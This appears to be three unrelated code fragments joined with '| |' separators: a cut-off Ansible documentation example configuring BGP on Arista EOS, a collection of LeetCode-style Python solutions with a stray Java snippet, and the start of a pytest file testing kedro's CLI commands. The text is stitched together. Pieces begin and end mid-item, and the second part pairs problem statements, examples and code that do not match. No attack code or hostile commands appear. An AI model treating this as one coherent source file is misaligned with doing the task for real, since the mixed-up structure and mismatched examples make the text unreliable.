# distance bgp 50 50 50
# maximum-paths 55
# bgp additional-paths send any
# neighbor peer1 peer-group
# neighbor peer1 link-bandwidth update-delay 5
# neighbor peer1 fall-over bfd
# neighbor peer1 monitoring
# neighbor peer1 send-community extended link-bandwidth aggregate 600
# neighbor peer1 maximum-routes 12000
# neighbor 10.1.3.2 export-localpref 4000
# neighbor 10.1.3.2 next-hop-unchanged
# neighbor 10.1.3.2 dont-capability-negotiate
# neighbor 10.1.3.2 allowas-in 3
# neighbor 10.1.3.2 default-originate always
# neighbor 10.1.3.2 maximum-routes 500 warning-limit 5 percent
# aggregate-address 1.2.1.0/24 as-set match-map match01
# aggregate-address 5.2.1.0/24 attribute-map attrmatch01 advertise-only
# redistribute static route-map map_static
# redistribute attached-host
# !
# vlan 5
# !
# address-family ipv4
# neighbor 10.1.3.2 prefix-list prefix01 out
# !
# vrf vrf01
# route-target import 54:11
# neighbor 192.168.3.11 dont-capability-negotiate
# neighbor 192.168.3.11 allowas-in 3
# neighbor 192.168.3.11 default-originate always
# neighbor 192.168.3.11 maximum-routes 12000
# veos(config)#
- name: replace provided configuration with device configuration
arista.eos.eos_bgp_global:
config:
as_number: "100"
bgp_params:
host_routes: True
convergence:
slow_peer: True
time: 6
additional_paths: "send"
log_neighbor_changes: True
vrfs:
- vrf: "vrf01"
maximum_paths:
max_equal_cost_paths: 55
aggregate_address:
- address: "1.2.1.0/24"
as_set: true
match_map: "match01"
- address: "5.2.1.0/24"
attribute_map: "attrmatch01"
advertise_only: true
redistribute:
- protocol: "static"
route_map: "map_static"
- protocol: "attached-host"
distance:
internal: 50
neighbor:
- peer: "10.1.3.2"
allowas_in:
set: true
default_originate:
always: true
dont_capability_negotiate: true
export_localpref: 4000
maximum_received_routes:
count: 500
warning_limit:
limit_percent: 5
next_hop_unchanged: true
prefix_list:
name: "prefix01"
direction: "out"
- peer: "peer1"
fall_over: true
link_bandwidth:
update_delay: 5
monitoring: True
send_community:
community_attribute: "extended"
sub_attribute: "link-bandwidth"
link_bandwidth_attribute: "aggregate"
speed: "600"
state: replaced
# After State:
# veos(config)#show running-config | section bgp
# router bgp 100
# bgp convergence slow-peer time 6
# bgp additional-paths send any
# !
# vrf vrf01
# distance bgp 50 50 50
# maximum-paths 55
# neighbor 10.1.3.2 export-localpref 4000
# neighbor 10.1.3.2 next-hop-unchanged
# neighbor 10.1.3.2 dont-capability-negotiate
# neighbor 10.1.3.2 allowas-in 3
# neighbor 10.1.3.2 default-originate always
# neighbor 10.1.3.2 maximum-routes 500 warning-limit 5 percent
# aggregate-address 1.2.1.0/24 as-set match-map match01
# aggregate-address 5.2.1.0/24 attribute-map attrmatch01 advertise-only
# redistribute static route-map map_static
# redistribute attached-host
# !
# address-family ipv4
# neighbor 10.1.3.2 prefix-list prefix01 out
# veos(config)#
#
#
# Module Execution:
#
# "after": {
# "as_number": "100",
# "bgp_params": {
# "additional_paths": "send",
# "convergence": {
# "slow_peer": true,
# "time": 6
# }
# },
# "vrfs": [
# {
# "aggregate_address": [
# {
# "address": "1.2.1.0/24",
# "as_set": true,
# "match_map": "match01"
# },
# {
# "address": "5.2.1.0/24",
# "advertise_only": true,
# "attribute_map": "attrmatch01"
# }
# ],
# "distance": {
# "external": 50,
# "internal": 50,
# "local": 50
# },
# "maximum_paths": {
# "max_equal_cost_paths": 55
# },
# "neighbor": [
# {
# "allowas_in": {
# "count": 3
# },
# "default_originate": {
# "always": true
# },
# "dont_capability_negotiate": true,
# "export_localpref": 4000,
# "maximum_received_routes": {
# "count": 500,
# "warning_limit": {
# "limit_percent": 5
# }
# },
# "next_hop_unchanged": true,
# "peer": "10.1.3.2"
# }
# ],
# "redistribute": [
# {
# "protocol": "static",
# "route_map": "map_static"
# },
# {
# "protocol": "attached-host"
# }
# ],
# "vrf": "vrf01"
# }
# ]
# },
# "before": {
# "aggregate_address": [
# {
# "address": "1.2.1.0/24",
# "as_set": true,
# "match_map": "match01"
# },
# {
# "address": "5.2.1.0/24",
# "advertise_only": true,
# "attribute_map": "attrmatch01"
# }
# ],
# "as_number": "100",
# "bgp_params": {
# "additional_paths": "send",
# "convergence": {
# "slow_peer": true,
# "time": 6
# }
# },
# "distance": {
# "external": 50,
# "internal": 50,
# "local": 50
# },
# "maximum_paths": {
# "max_equal_cost_paths": 55
# },
# "neighbor": [
# {
# "fall_over": true,
# "link_bandwidth": {
# "set": true,
# | |
courses.
# There may be multiple correct orders, you just need to return one of them.
# If it is impossible to finish all courses, return an empty array.
from collections import defaultdict, deque
class Solution:
    def findOrder(self, numCourses, prerequisites):
        """
        Return one valid order to take all courses (a topological order),
        or [] if the prerequisites contain a cycle.

        Kahn's algorithm: repeatedly schedule a course whose in-degree is 0,
        then relax its dependents. O(V + E) time.

        :type numCourses: int
        :type prerequisites: List[List[int]]  # pairs [dest, src]: src before dest
        :rtype: List[int]
        """
        # Build adjacency list and in-degree table.
        adj_list = defaultdict(list)
        indegree = {}
        for dest, src in prerequisites:
            adj_list[src].append(dest)
            # Record each node's in-degree
            indegree[dest] = indegree.get(dest, 0) + 1
        # Queue for maintaining nodes that have 0 in-degree.
        # deque gives O(1) popleft; list.pop(0) was O(n) per dequeue.
        zero_indegree_queue = deque(k for k in range(numCourses) if k not in indegree)
        topological_sorted_order = []
        while zero_indegree_queue:
            # Pop one node with 0 in-degree (FIFO, same order as before).
            vertex = zero_indegree_queue.popleft()
            topological_sorted_order.append(vertex)
            # Reduce in-degree for all the neighbors; .get avoids inserting
            # empty entries into the defaultdict for sink nodes.
            for neighbor in adj_list.get(vertex, ()):
                indegree[neighbor] -= 1
                # Add neighbor to the queue once its prerequisites are done.
                if indegree[neighbor] == 0:
                    zero_indegree_queue.append(neighbor)
        # A complete order exists only if every course was scheduled.
        return topological_sorted_order if len(topological_sorted_order) == numCourses else []
# Input: [[100, 200], [200, 1300], [1000, 1250], [2000, 3200]]
# Output: 3
# Explanation:
# There're totally 4 courses, but you can take 3 courses at most:
# First, take the 1st course, it costs 100 days so you will finish it on the 100th day, and ready to take the next course on the 101st day.
# Second, take the 3rd course, it costs 1000 days so you will finish it on the 1100th day, and ready to take the next course on the 1101st day.
# Third, take the 2nd course, it costs 200 days so you will finish it on the 1300th day.
# The 4th course cannot be taken now, since you will finish it on the 3300th day, which exceeds the closed date.
# public class Solution {
# public int scheduleCourse(int[][] courses) {
# Arrays.sort(courses, (a, b) -> a[1] - b[1]);
# PriorityQueue < Integer > queue = new PriorityQueue < > ((a, b) -> b - a);
# int time = 0;
# for (int[] c: courses) {
# if (time + c[0] <= c[1]) {
# queue.offer(c[0]);
# time += c[0];
# } else if (!queue.isEmpty() && queue.peek() > c[0]) {
# time += c[0] - queue.poll();
# queue.offer(c[0]);
# }
# }
# return queue.size();
# }
# }
# Given a string S and a string T, find the minimum window in S
# which will contain all the characters in T in complexity O(n).
# Example:
# Input: S = "ADOBECODEBANC", T = "ABC"
# Output: "BANC"
class Solution(object):
    def minWindow(self, s, t):
        """
        Return the minimum window (substring) of s that contains every
        character of t with multiplicity, or "" if no such window exists.

        Sliding window: extend r until the window covers t, then shrink l
        while coverage holds, tracking the shortest window seen.
        O(len(s) + len(t)) time.

        :type s: str
        :type t: str
        :rtype: str
        """
        # Bug fix: the file only imports `defaultdict` from collections, so
        # the bare `collections.defaultdict` / `collections.Counter`
        # references raised NameError at runtime.
        from collections import Counter, defaultdict
        window_dict = defaultdict(int)
        t_dict = Counter(t)
        l, r = 0, 0
        ans = (float("inf"), l, r)  # (window length, left, right)
        formed, reqd = 0, len(t_dict)
        while r < len(s):
            character = s[r]
            window_dict[character] += 1
            # A character is "satisfied" once its window count reaches t's count.
            if character in t_dict and window_dict[character] == t_dict[character]:
                formed += 1
            # Shrink from the left while the window still covers t.
            while l <= r and formed == reqd:
                character = s[l]
                if r - l + 1 < ans[0]:
                    ans = (r - l + 1, l, r)
                window_dict[character] -= 1
                if character in t_dict and window_dict[character] < t_dict[character]:
                    formed -= 1
                l += 1
            r += 1
        return "" if ans[0] == float("inf") else s[ans[1]:ans[2] + 1]
# Serialize and Deserialize BST
# Definition for a binary tree node.
# class TreeNode(object):
# def __init__(self, x):
# self.val = x
# self.left = None
# self.right = None
class Codec:
    def serialize(self, root):
        """Encodes a tree to a single string.
        :type root: TreeNode
        :rtype: str
        """
        # Pre-order traversal with explicit "None" markers so the tree
        # shape is recoverable without separate structure information.
        if root is None:
            return "None"
        return str(root.val) + "," + self.serialize(root.left) + "," + self.serialize(root.right)
    def deserialize(self, data):
        """Decodes your encoded data to tree.
        :type data: str
        :rtype: TreeNode
        """
        nodes = data.split(",")
        def _deserialize(nodelist):
            if nodelist[0] == "None":
                nodelist.pop(0)
                return None
            # Bug fix: values were serialized from ints but rebuilt as str;
            # convert back so BST value comparisons keep working after a
            # round trip. Pop after creating the node is the key here.
            root = TreeNode(int(nodelist.pop(0)))
            root.left = _deserialize(nodelist)
            root.right = _deserialize(nodelist)
            return root
        return _deserialize(nodes)
# Your Codec object will be instantiated and called as such:
# codec = Codec()
# codec.deserialize(codec.serialize(root))
# Serialize and Deserialize Binary Tree
# Definition for a binary tree node.
# class TreeNode(object):
# def __init__(self, x):
# self.val = x
# self.left = None
# self.right = None
class Codec:
    def serialize(self, root):
        """Encodes a tree to a single string.
        :type root: TreeNode
        :rtype: str
        """
        # Pre-order traversal; "None" marks absent children so the shape
        # can be reconstructed unambiguously.
        if root is None:
            return "None"
        return str(root.val) + "," + self.serialize(root.left) + "," + self.serialize(root.right)
    def deserialize(self, data):
        """Decodes your encoded data to tree.
        :type data: str
        :rtype: TreeNode
        """
        def dfs(data_list):
            if data_list[0] == "None":
                data_list.pop(0)
                return None
            # Bug fix: node values were serialized from ints but rebuilt as
            # strings; convert back so values round-trip with their type.
            t1 = TreeNode(int(data_list.pop(0)))
            t1.left = dfs(data_list)
            t1.right = dfs(data_list)
            return t1
        return dfs(data.split(","))
# Your Codec object will be instantiated and called as such:
# codec = Codec()
# codec.deserialize(codec.serialize(root))
# Integer to English Words
# Input: 123
# Output: "One Hundred Twenty Three"
class Solution(object):
    def numberToWords(self, num):
        """
        Convert a non-negative integer to its English-words representation,
        e.g. 123 -> "One Hundred Twenty Three".
        :type num: int
        :rtype: str
        """
        units = {1: "One", 2: "Two", 3: "Three", 4: "Four", 5: "Five", 6: "Six", 7: "Seven", 8: "Eight", 9: "Nine"}
        teens = {10: "Ten", 11: "Eleven", 12: "Twelve", 13: "Thirteen", 14: "Fourteen", 15: "Fifteen", 16: "Sixteen", 17: "Seventeen", 18: "Eighteen", 19: "Nineteen"}
        multiples_of_ten = {2: "Twenty", 3: "Thirty", 4: "Forty", 5: "Fifty", 6: "Sixty", 7: "Seventy", 8: "Eighty", 9: "Ninety"}
        def two_digits(n):
            # Words for 0 <= n < 100; empty string when n == 0.
            if not n:
                return ""
            if n < 10:
                return units[n]
            if n < 20:
                return teens[n]
            quotient, remainder = divmod(n, 10)
            if remainder:
                return multiples_of_ten[quotient] + " " + units[remainder]
            return multiples_of_ten[quotient]
        def three_digits(n):
            # Words for 0 <= n < 1000.
            hundreds, rest = divmod(n, 100)
            if hundreds and rest:
                return units[hundreds] + " Hundred " + two_digits(rest)
            if hundreds:
                return units[hundreds] + " Hundred"
            return two_digits(rest)
        if not num:
            return "Zero"
        # Split into billion/million/thousand/unit groups and join the
        # non-empty group phrases with single spaces.
        pieces = []
        for scale_value, scale_name in ((10 ** 9, " Billion"), (10 ** 6, " Million"), (1000, " Thousand"), (1, "")):
            chunk, num = divmod(num, scale_value)
            if chunk:
                pieces.append(three_digits(chunk) + scale_name)
        return " ".join(pieces)
# Search in Rotated Sorted Array
# Suppose an array sorted in ascending order is rotated at some pivot unknown to you beforehand.
# (i.e., [0,1,2,4,5,6,7] might become [4,5,6,7,0,1,2]).
class Solution(object):
    def search(self, nums, target):
        """
        Find target in an ascending array rotated at an unknown pivot;
        return its index, or -1 when absent.
        :type nums: List[int]
        :type target: int
        :rtype: int
        """
        def rotation_point(lo, hi):
            # Index of the smallest element; 0 when the array is not rotated
            # (a rotated array always has nums[0] > nums[-1]).
            if nums[lo] < nums[hi]:
                return 0
            while lo <= hi:
                mid = (lo + hi) // 2
                # The anomaly nums[i] > nums[i + 1] marks the rotation point.
                if nums[mid] > nums[mid + 1]:
                    return mid + 1
                if nums[mid] < nums[lo]:
                    # Rotation point lies to the left of mid.
                    hi = mid - 1
                else:
                    lo = mid + 1
        def binary_search(lo, hi):
            # Standard binary search for target within nums[lo..hi].
            while lo <= hi:
                mid = (lo + hi) // 2
                if nums[mid] == target:
                    return mid
                if nums[mid] < target:
                    lo = mid + 1
                else:
                    hi = mid - 1
            return -1
        count = len(nums)
        if count == 0:
            return -1
        if count == 1:
            return 0 if nums[0] == target else -1
        pivot = rotation_point(0, count - 1)
        if nums[pivot] == target:
            return pivot
        if pivot == 0:
            # Not rotated: search the whole array.
            return binary_search(0, count - 1)
        # Values below nums[0] live in the right (post-pivot) half.
        if target < nums[0]:
            return binary_search(pivot, count - 1)
        return binary_search(0, pivot)
# Given a matrix of M x N elements (M rows, N columns),
# return all elements of the matrix in | |
<reponame>ANA-POTJE/kedro
# Copyright 2020 QuantumBlack Visual Analytics Limited
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES
# OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE, AND
# NONINFRINGEMENT. IN NO EVENT WILL THE LICENSOR OR OTHER CONTRIBUTORS
# BE LIABLE FOR ANY CLAIM, DAMAGES, OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF, OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
#
# The QuantumBlack Visual Analytics Limited ("QuantumBlack") name and logo
# (either separately or in combination, "QuantumBlack Trademarks") are
# trademarks of QuantumBlack. The License does not grant you any right or
# license to the QuantumBlack Trademarks. You may not use the QuantumBlack
# Trademarks or any confusingly similar mark as a trademark for your product,
# or use the QuantumBlack Trademarks in any other manner that might cause
# confusion in the marketplace, including but not limited to in advertising,
# on websites, or on software.
#
# See the License for the specific language governing permissions and
# limitations under the License.
# pylint: disable=unused-argument
import os
import subprocess
import sys
from pathlib import Path
from tempfile import NamedTemporaryFile
import anyconfig
import pytest
from click.testing import CliRunner
from kedro.context import KEDRO_ENV_VAR
from kedro.runner import ParallelRunner, SequentialRunner
@pytest.fixture(autouse=True)
def call_mock(mocker, fake_kedro_cli):
    # Auto-used: stubs out the CLI module's ``call`` helper (shell-command
    # runner) so tests can assert on attempted subprocess invocations.
    return mocker.patch.object(fake_kedro_cli, "call")
@pytest.fixture(autouse=True)
def python_call_mock(mocker, fake_kedro_cli):
    # Auto-used: stubs out ``python_call`` (runs ``python -m <module>``)
    # so tests can assert on module invocations without executing them.
    return mocker.patch.object(fake_kedro_cli, "python_call")
@pytest.fixture()
def fake_ipython_message(mocker, fake_kedro_cli):
    # Stubs out the banner printed before launching an IPython session.
    return mocker.patch.object(fake_kedro_cli, "ipython_message")
class TestActivateNbstripoutCommand:
    """Tests for the ``kedro activate-nbstripout`` CLI command."""
    @staticmethod
    @pytest.fixture()
    def fake_nbstripout():
        """
        ``nbstripout`` tries to access ``sys.stdin.buffer.readable``
        on import, but it's patched by pytest.
        Let's replace it by the fake!
        """
        sys.modules["nbstripout"] = "fake"
        yield
        del sys.modules["nbstripout"]
    @staticmethod
    @pytest.fixture
    def fake_git_repo(mocker):
        # Simulate ``git rev-parse`` succeeding (we are inside a git repo).
        return mocker.patch("subprocess.run", return_value=mocker.Mock(returncode=0))
    @staticmethod
    @pytest.fixture
    def without_git_repo(mocker):
        # Simulate ``git rev-parse`` failing (not inside a git repo).
        return mocker.patch("subprocess.run", return_value=mocker.Mock(returncode=1))
    def test_install_successfully(
        self, fake_kedro_cli, call_mock, fake_nbstripout, fake_git_repo
    ):
        # Happy path: nbstripout importable and a git repo is detected.
        result = CliRunner().invoke(fake_kedro_cli.cli, ["activate-nbstripout"])
        assert not result.exit_code
        call_mock.assert_called_once_with(["nbstripout", "--install"])
        fake_git_repo.assert_called_once_with(
            ["git", "rev-parse", "--git-dir"],
            stdout=subprocess.PIPE,
            stderr=subprocess.PIPE,
        )
    def test_nbstripout_not_installed(self, fake_kedro_cli, fake_git_repo, mocker):
        """
        Run activate-nbstripout target without nbstripout installed
        There should be a clear message about it.
        """
        mocker.patch.dict("sys.modules", {"nbstripout": None})
        result = CliRunner().invoke(fake_kedro_cli.cli, ["activate-nbstripout"])
        assert result.exit_code
        assert "nbstripout is not installed" in result.stdout
    def test_no_git_repo(self, fake_kedro_cli, fake_nbstripout, without_git_repo):
        """
        Run activate-nbstripout target with no git repo available.
        There should be a clear message about it.
        """
        result = CliRunner().invoke(fake_kedro_cli.cli, ["activate-nbstripout"])
        assert result.exit_code
        assert "Not a git repository" in result.stdout
class TestRunCommand:
    """Tests for the ``kedro run`` CLI command: runner selection, run-config
    files, environment selection, and ``--params`` parsing."""
    @staticmethod
    @pytest.fixture(autouse=True)
    def fake_load_context(mocker, fake_kedro_cli):
        # Auto-applied: every test gets a mocked context so the arguments
        # passed to ``context.run`` can be inspected.
        context = mocker.Mock()
        yield mocker.patch.object(fake_kedro_cli, "load_context", return_value=context)
    @staticmethod
    @pytest.fixture(params=["run_config.yml", "run_config.json"])
    def fake_run_config(request, fake_root_dir):
        # Writes a run-config file; both YAML and JSON variants are exercised.
        config_path = str(fake_root_dir / request.param)
        anyconfig.dump(
            {
                "run": {
                    "pipeline": "pipeline1",
                    "tag": ["tag1", "tag2"],
                    "node_names": ["node1", "node2"],
                }
            },
            config_path,
        )
        return config_path
    @staticmethod
    @pytest.fixture()
    def fake_run_config_with_params(fake_run_config, request):
        # Extends the base run-config with extra keys supplied via indirect
        # parametrization (``request.param``).
        config = anyconfig.load(fake_run_config)
        config["run"].update(request.param)
        anyconfig.dump(config, fake_run_config)
        return fake_run_config
    def test_run_successfully(self, fake_kedro_cli, fake_load_context, mocker):
        result = CliRunner().invoke(fake_kedro_cli.cli, ["run"])
        assert not result.exit_code
        fake_load_context.return_value.run.assert_called_once_with(
            tags=(),
            runner=mocker.ANY,
            node_names=(),
            from_nodes=[],
            to_nodes=[],
            from_inputs=[],
            load_versions={},
            pipeline_name=None,
        )
        # The default runner is sequential.
        assert isinstance(
            fake_load_context.return_value.run.call_args_list[0][1]["runner"],
            SequentialRunner,
        )
    def test_with_sequential_runner_and_parallel_flag(
        self, fake_kedro_cli, fake_load_context
    ):
        # ``--parallel`` and an explicit ``--runner`` are mutually exclusive.
        result = CliRunner().invoke(
            fake_kedro_cli.cli, ["run", "--parallel", "--runner=SequentialRunner"]
        )
        assert result.exit_code
        assert "Please use either --parallel or --runner" in result.stdout
        fake_load_context.return_value.run.assert_not_called()
    def test_run_successfully_parallel_via_flag(
        self, fake_kedro_cli, fake_load_context, mocker
    ):
        result = CliRunner().invoke(fake_kedro_cli.cli, ["run", "--parallel"])
        assert not result.exit_code
        fake_load_context.return_value.run.assert_called_once_with(
            tags=(),
            runner=mocker.ANY,
            node_names=(),
            from_nodes=[],
            to_nodes=[],
            from_inputs=[],
            load_versions={},
            pipeline_name=None,
        )
        assert isinstance(
            fake_load_context.return_value.run.call_args_list[0][1]["runner"],
            ParallelRunner,
        )
    def test_run_successfully_parallel_via_name(
        self, fake_kedro_cli, fake_load_context
    ):
        result = CliRunner().invoke(
            fake_kedro_cli.cli, ["run", "--runner=ParallelRunner"]
        )
        assert not result.exit_code
        assert isinstance(
            fake_load_context.return_value.run.call_args_list[0][1]["runner"],
            ParallelRunner,
        )
    @pytest.mark.parametrize("config_flag", ["--config", "-c"])
    def test_run_with_config(
        self, config_flag, fake_kedro_cli, fake_load_context, fake_run_config, mocker
    ):
        # Values from the run-config file feed straight into ``context.run``.
        result = CliRunner().invoke(
            fake_kedro_cli.cli, ["run", config_flag, fake_run_config]
        )
        assert not result.exit_code
        fake_load_context.return_value.run.assert_called_once_with(
            tags=("tag1", "tag2"),
            runner=mocker.ANY,
            node_names=("node1", "node2"),
            from_nodes=[],
            to_nodes=[],
            from_inputs=[],
            load_versions={},
            pipeline_name="pipeline1",
        )
    @pytest.mark.parametrize(
        "fake_run_config_with_params,expected",
        [
            ({}, {}),
            ({"params": {"foo": "baz"}}, {"foo": "baz"}),
            ({"params": "foo:baz"}, {"foo": "baz"}),
            ({"params": {"foo": "123.45", "baz": "678", "bar": 9}}, {"foo": "123.45", "baz": "678", "bar": 9}),
        ],
        indirect=["fake_run_config_with_params"],
    )
    def test_run_with_params_in_config(
        self,
        expected,
        fake_kedro_cli,
        fake_load_context,
        fake_run_config_with_params,
        mocker,
    ):
        # ``params`` in the run-config become ``extra_params`` of the context.
        result = CliRunner().invoke(
            fake_kedro_cli.cli, ["run", "-c", fake_run_config_with_params]
        )
        assert not result.exit_code
        fake_load_context.return_value.run.assert_called_once_with(
            tags=("tag1", "tag2"),
            runner=mocker.ANY,
            node_names=("node1", "node2"),
            from_nodes=[],
            to_nodes=[],
            from_inputs=[],
            load_versions={},
            pipeline_name="pipeline1",
        )
        fake_load_context.assert_called_once_with(
            Path.cwd(), env=mocker.ANY, extra_params=expected
        )
    def test_run_env_environment_var(
        self, fake_kedro_cli, fake_load_context, fake_repo_path, monkeypatch, mocker
    ):
        # The KEDRO_ENV environment variable selects the run environment.
        monkeypatch.setenv("KEDRO_ENV", "my_special_env")
        result = CliRunner().invoke(fake_kedro_cli.cli, ["run"])
        assert not result.exit_code
        fake_load_context.assert_called_once_with(
            Path.cwd(), env="my_special_env", extra_params=mocker.ANY
        )
    @pytest.mark.parametrize(
        "cli_arg,expected_extra_params",
        [
            ("foo:bar", {"foo": "bar"}),
            (
                "foo:123.45, bar:1a,baz:678. ,qux:1e-2,quux:0,quuz:",
                {
                    "foo": 123.45,
                    "bar": "1a",
                    "baz": 678,
                    "qux": 0.01,
                    "quux": 0,
                    "quuz": "",
                },
            ),
            ("foo:bar,baz:fizz:buzz", {"foo": "bar", "baz": "fizz:buzz"}),
            (
                "foo:bar, baz: https://example.com",
                {"foo": "bar", "baz": "https://example.com"},
            ),
            ("foo:bar,baz:fizz buzz", {"foo": "bar", "baz": "fizz buzz"}),
            ("foo:bar, foo : fizz buzz ", {"foo": "fizz buzz"}),
        ],
    )
    def test_run_extra_params(
        self, mocker, fake_kedro_cli, fake_load_context, cli_arg, expected_extra_params
    ):
        # ``--params key:value,...`` is parsed, numbers coerced, later
        # duplicate keys win.
        result = CliRunner().invoke(fake_kedro_cli.cli, ["run", "--params", cli_arg])
        assert not result.exit_code
        fake_load_context.assert_called_once_with(
            Path.cwd(), env=mocker.ANY, extra_params=expected_extra_params
        )
    @pytest.mark.parametrize("bad_arg", ["bad", "foo:bar,bad"])
    def test_bad_extra_params(self, fake_kedro_cli, fake_load_context, bad_arg):
        # Items without a ``:`` separator are rejected with a clear message.
        result = CliRunner().invoke(fake_kedro_cli.cli, ["run", "--params", bad_arg])
        assert result.exit_code
        assert (
            "Item `bad` must contain a key and a value separated by `:`"
            in result.stdout
        )
    @pytest.mark.parametrize("bad_arg", [":", ":value", " :value"])
    def test_bad_params_key(self, fake_kedro_cli, fake_load_context, bad_arg):
        # Empty (or whitespace-only) parameter keys are rejected.
        result = CliRunner().invoke(fake_kedro_cli.cli, ["run", "--params", bad_arg])
        assert result.exit_code
        assert "Parameter key cannot be an empty string" in result.stdout
class TestTestCommand:
    """Tests for the ``kedro test`` CLI command (a thin pytest wrapper)."""
    def test_happy_path(self, fake_kedro_cli, python_call_mock):
        # Extra CLI arguments are forwarded to pytest verbatim.
        result = CliRunner().invoke(
            fake_kedro_cli.cli, ["test", "--random-arg", "value"]
        )
        assert not result.exit_code
        python_call_mock.assert_called_once_with("pytest", ("--random-arg", "value"))
    def test_pytest_not_installed(self, fake_kedro_cli, python_call_mock, mocker):
        # A missing pytest dependency aborts with a helpful message and
        # never attempts the call.
        mocker.patch.dict("sys.modules", {"pytest": None})
        result = CliRunner().invoke(
            fake_kedro_cli.cli, ["test", "--random-arg", "value"]
        )
        expected_message = fake_kedro_cli.NO_DEPENDENCY_MESSAGE.format("pytest")
        assert result.exit_code
        assert expected_message in result.stdout
        python_call_mock.assert_not_called()
class TestLintCommand:
    """Tests for the ``kedro lint`` CLI command (flake8 / isort / black)."""
    def test_bare_lint(self, fake_kedro_cli, python_call_mock, mocker):
        # With no file arguments, linting targets the project source dirs.
        result = CliRunner().invoke(fake_kedro_cli.cli, ["lint"])
        assert not result.exit_code
        files = ("src/tests", "src/fake_package")
        expected_calls = [
            mocker.call("flake8", ("--max-line-length=88",) + files),
            mocker.call(
                "isort", ("-rc", "-tc", "-up", "-fgw=0", "-m=3", "-w=88") + files
            ),
        ]
        # black is only invoked on Python 3.6+.
        if sys.version_info[:2] >= (3, 6):
            expected_calls.append(mocker.call("black", files)) # pragma: no cover
        assert python_call_mock.call_args_list == expected_calls
    def test_file_lint(self, fake_kedro_cli, python_call_mock, mocker):
        # Explicit file arguments replace the default lint targets.
        result = CliRunner().invoke(fake_kedro_cli.cli, ["lint", "kedro"])
        assert not result.exit_code
        files = ("kedro",)
        expected_calls = [
            mocker.call("flake8", ("--max-line-length=88",) + files),
            mocker.call(
                "isort", ("-rc", "-tc", "-up", "-fgw=0", "-m=3", "-w=88") + files
            ),
        ]
        if sys.version_info[:2] >= (3, 6):
            expected_calls.append(mocker.call("black", files)) # pragma: no cover
        assert python_call_mock.call_args_list == expected_calls
    @pytest.mark.parametrize("module_name", ["flake8", "isort"])
    def test_import_not_installed(
        self, fake_kedro_cli, python_call_mock, module_name, mocker
    ):
        # A missing linter dependency aborts with a helpful message.
        mocker.patch.dict("sys.modules", {module_name: None})
        result = CliRunner().invoke(fake_kedro_cli.cli, ["lint"])
        expected_message = fake_kedro_cli.NO_DEPENDENCY_MESSAGE.format(module_name)
        assert result.exit_code
        assert expected_message in result.stdout
        python_call_mock.assert_not_called()
class TestInstallCommand:
    """Tests for the ``kedro install`` CLI command."""
    def test_happy_path(self, python_call_mock, call_mock, fake_kedro_cli):
        # Without an environment file, only pip requirements are installed.
        result = CliRunner().invoke(fake_kedro_cli.cli, ["install"])
        assert not result.exit_code
        python_call_mock.assert_called_once_with(
            "pip", ["install", "-U", "-r", "src/requirements.txt"]
        )
        call_mock.assert_not_called()
    def test_with_env_file(self, python_call_mock, call_mock, fake_kedro_cli, mocker):
        # Pretend env file exists:
        mocker.patch.object(Path, "is_file", return_value=True)
        result = CliRunner().invoke(fake_kedro_cli.cli, ["install"])
        assert not result.exit_code, result.stdout
        python_call_mock.assert_called_once_with(
            "pip", ["install", "-U", "-r", "src/requirements.txt"]
        )
        # Conda environment is additionally installed when the file exists.
        call_mock.assert_called_once_with(
            ["conda", "install", "--file", "src/environment.yml", "--yes"]
        )
    def test_windows(self, fake_kedro_cli, mocker):
        mock_subprocess = mocker.patch.object(fake_kedro_cli, "subprocess")
        # pretend we are on Windows
        mocker.patch.object(fake_kedro_cli, "os").name = "nt"
        result = CliRunner().invoke(fake_kedro_cli.cli, ["install"])
        assert not result.exit_code, result.stdout
        # On Windows pip runs in a fresh console via subprocess.Popen.
        command = [
            sys.executable,
            "-m",
            "pip",
            "install",
            "-U",
            "-r",
            "src/requirements.txt",
        ]
        mock_subprocess.Popen.assert_called_once_with(
            command, creationflags=mock_subprocess.CREATE_NEW_CONSOLE
        )
class TestIpythonCommand:
    """Tests for the ``kedro ipython`` CLI command."""
    def test_happy_path(self, call_mock, fake_kedro_cli, fake_ipython_message):
        # The banner is printed and extra args are passed through to ipython.
        result = CliRunner().invoke(
            fake_kedro_cli.cli, ["ipython", "--random-arg", "value"]
        )
        assert not result.exit_code, result.stdout
        fake_ipython_message.assert_called_once_with()
        call_mock.assert_called_once_with(["ipython", "--random-arg", "value"])
    @pytest.mark.parametrize("help_flag", ["-h", "--help"])
    def test_help(self, help_flag, call_mock, fake_kedro_cli, fake_ipython_message):
        # Requesting help must not print the ipython banner message.
        result = CliRunner().invoke(fake_kedro_cli.cli, ["ipython", help_flag])
        assert not result.exit_code, result.stdout
        fake_ipython_message.assert_not_called()
        call_mock.assert_called_once_with(["ipython", help_flag])
class TestPackageCommand:
    """Tests for the ``kedro package`` CLI command."""
    def test_happy_path(self, call_mock, fake_kedro_cli, mocker):
        # Packaging builds both an egg and a wheel from src/setup.py.
        result = CliRunner().invoke(fake_kedro_cli.cli, ["package"])
        assert not result.exit_code, result.stdout
        call_mock.assert_has_calls(
            [
                mocker.call(
                    [sys.executable, "setup.py", "clean", "--all", "bdist_egg"],
                    cwd="src",
                ),
                mocker.call(
                    [sys.executable, "setup.py", "clean", "--all", "bdist_wheel"],
                    cwd="src",
                ),
            ]
        )
class TestBuildDocsCommand:
    """Tests for the ``kedro build-docs`` CLI command."""
    def test_happy_path(self, call_mock, python_call_mock, fake_kedro_cli, mocker):
        fake_rmtree = mocker.patch("shutil.rmtree")
        result = CliRunner().invoke(fake_kedro_cli.cli, ["build-docs"])
        assert not result.exit_code, result.stdout
        # sphinx-apidoc then sphinx-build are invoked in order.
        call_mock.assert_has_calls(
            [
                mocker.call(
                    [
                        "sphinx-apidoc",
                        "--module-first",
                        "-o",
                        "docs/source",
                        "src/fake_package",
                    ]
                ),
                mocker.call(
                    ["sphinx-build", "-M", "html", "docs/source", "docs/build", "-a"]
                ),
            ]
        )
        # Docs extras, project requirements and an ipykernel are installed.
